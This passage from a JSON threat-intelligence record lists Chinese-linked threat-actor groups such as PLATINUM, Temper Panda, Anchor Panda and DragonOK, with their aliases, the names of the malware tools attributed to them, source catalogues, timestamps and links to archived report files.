			"source_name": "MISPGALAXY:PLATINUM",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "1f29d13d-268d-4c26-ac4a-1ce8cebdbd3a",
			"created_at": "2023-01-06T13:46:38.351187Z",
			"updated_at": "2026-04-10T02:00:02.938577Z",
			"deleted_at": null,
			"main_name": "TEMPER PANDA",
			"aliases": [
				"Admin338",
				"Team338",
				"admin@338",
				"G0018"
			],
			"source_name": "MISPGALAXY:TEMPER PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e61c46f7-88a1-421a-9fed-0cfe2eeb820a",
			"created_at": "2022-10-25T16:07:24.061767Z",
			"updated_at": "2026-04-10T02:00:04.854503Z",
			"deleted_at": null,
			"main_name": "Platinum",
			"aliases": [
				"ATK 33",
				"G0068",
				"Operation EasternRoppels",
				"TwoForOne"
			],
			"source_name": "ETDA:Platinum",
			"tools": [
				"AMTsol",
				"Adupib",
				"Adupihan",
				"Dipsind",
				"DvDupdate.dll",
				"JPIN",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"RedPepper",
				"RedSalt",
				"Titanium",
				"adbupd",
				"psinstrc.ps1"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2ac8fb39-1ad4-407c-bf51-249751a575ba",
			"created_at": "2023-01-06T13:46:38.337728Z",
			"updated_at": "2026-04-10T02:00:02.933527Z",
			"deleted_at": null,
			"main_name": "SAMURAI PANDA",
			"aliases": [
				"PLA Navy",
				"Wisp Team"
			],
			"source_name": "MISPGALAXY:SAMURAI PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c6604303-a1c8-4e59-ba12-5da5c0bc6877",
			"created_at": "2023-01-06T13:46:38.312359Z",
			"updated_at": "2026-04-10T02:00:02.923025Z",
			"deleted_at": null,
			"main_name": "APT14",
			"aliases": [
				"ANCHOR PANDA",
				"QAZTeam"
			],
			"source_name": "MISPGALAXY:APT14",
			"tools": [
				"Backdoor.Win32.PoisonIvy",
				"Gen:Trojan.Heur.PT",
				"Torn RAT",
				"Anchor Panda",
				"Gh0st Rat",
				"Gh0stRat, GhostRat",
				"Poison Ivy"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "25a38dea-d23b-479b-9548-024e955b8964",
			"created_at": "2022-10-25T16:07:23.305911Z",
			"updated_at": "2026-04-10T02:00:04.533448Z",
			"deleted_at": null,
			"main_name": "Anchor Panda",
			"aliases": [
				"APT 14",
				"Anchor Panda",
				"QAZTeam"
			],
			"source_name": "ETDA:Anchor Panda",
			"tools": [
				"AngryRebel",
				"Chymine",
				"Darkmoon",
				"Farfli",
				"Gen:Trojan.Heur.PT",
				"Gh0st RAT",
				"Ghost RAT",
				"Moudour",
				"Mydoor",
				"PCRat",
				"Poison Ivy",
				"SPIVY",
				"Torn RAT",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "6301aade-ca8b-431c-b5e4-1b6ddd497ffc",
			"created_at": "2022-10-25T16:07:23.328033Z",
			"updated_at": "2026-04-10T02:00:04.544144Z",
			"deleted_at": null,
			"main_name": "APT 16",
			"aliases": [
				"APT 16",
				"G0023",
				"SVCMONDR"
			],
			"source_name": "ETDA:APT 16",
			"tools": [
				"ELMER",
				"Elmost",
				"IRONHALO",
				"SVCMONDR"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "593dd07d-853c-46cd-8117-e24061034bbf",
			"created_at": "2025-08-07T02:03:24.648074Z",
			"updated_at": "2026-04-10T02:00:03.625859Z",
			"deleted_at": null,
			"main_name": "BRONZE OVERBROOK",
			"aliases": [
				"Danti ",
				"DragonOK ",
				"Samurai Panda ",
				"Shallow Taurus ",
				"Temp.DragonOK "
			],
			"source_name": "Secureworks:BRONZE OVERBROOK",
			"tools": [
				"Aveo",
				"DDKONG",
				"Godzilla Webshell",
				"HelloBridge",
				"IsSpace",
				"NFLog Trojan",
				"PLAINTEE",
				"PlugX",
				"Rambo"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c23ca3e9-6b58-4f24-b4eb-ce3b24815ac4",
			"created_at": "2022-10-25T16:07:24.313367Z",
			"updated_at": "2026-04-10T02:00:04.932247Z",
			"deleted_at": null,
			"main_name": "Temper Panda",
			"aliases": [
				"G0018",
				"Team338",
				"Temper Panda",
				"admin@338"
			],
			"source_name": "ETDA:Temper Panda",
			"tools": [
				"BUBBLEWRAP",
				"Backdoor.APT.FakeWinHTTPHelper",
				"Bozok",
				"Bozok RAT",
				"Chymine",
				"Darkmoon",
				"Gen:Trojan.Heur.PT",
				"LOLBAS",
				"LOLBins",
				"LOWBALL",
				"Living off the Land",
				"Poison Ivy",
				"SPIVY",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "03888cef-07bb-436a-8501-c063c02d0cc9",
			"created_at": "2023-01-06T13:46:38.655383Z",
			"updated_at": "2026-04-10T02:00:03.056907Z",
			"deleted_at": null,
			"main_name": "EvilPost",
			"aliases": [],
			"source_name": "MISPGALAXY:EvilPost",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "340d1673-0678-4e1f-8b75-30da2f65cc80",
			"created_at": "2022-10-25T16:07:23.552036Z",
			"updated_at": "2026-04-10T02:00:04.653109Z",
			"deleted_at": null,
			"main_name": "DragonOK",
			"aliases": [
				"Bronze Overbrook",
				"G0017",
				"Shallow Taurus"
			],
			"source_name": "ETDA:DragonOK",
			"tools": [
				"Agent.dhwf",
				"CT",
				"Chymine",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"FF-RAT",
				"FormerFirstRAT",
				"Gen:Trojan.Heur.PT",
				"HTran",
				"HUC Packet Transmit Tool",
				"HelloBridge",
				"IsSpace",
				"KHRAT",
				"Kaba",
				"Korplug",
				"Mongall",
				"NFlog",
				"NewCT",
				"NfLog RAT",
				"PlugX",
				"Poison Ivy",
				"Rambo",
				"RedDelta",
				"SPIVY",
				"Sogu",
				"SysGet",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"TidePool",
				"Xamtrav",
				"brebsd",
				"ffrat",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "33f527a5-a5da-496a-a48c-7807cc858c3e",
			"created_at": "2022-10-25T15:50:23.803657Z",
			"updated_at": "2026-04-10T02:00:05.333523Z",
			"deleted_at": null,
			"main_name": "PLATINUM",
			"aliases": [
				"PLATINUM"
			],
			"source_name": "MITRE:PLATINUM",
			"tools": [
				"JPIN",
				"Dipsind",
				"adbupd"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434329,
	"ts_updated_at": 1775792134,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5f5a871c3a384effc66df7cba9103f909f1901ab.pdf",
		"text": "https://archive.orkl.eu/5f5a871c3a384effc66df7cba9103f909f1901ab.txt",
		"img": "https://archive.orkl.eu/5f5a871c3a384effc66df7cba9103f909f1901ab.jpg"
	}
}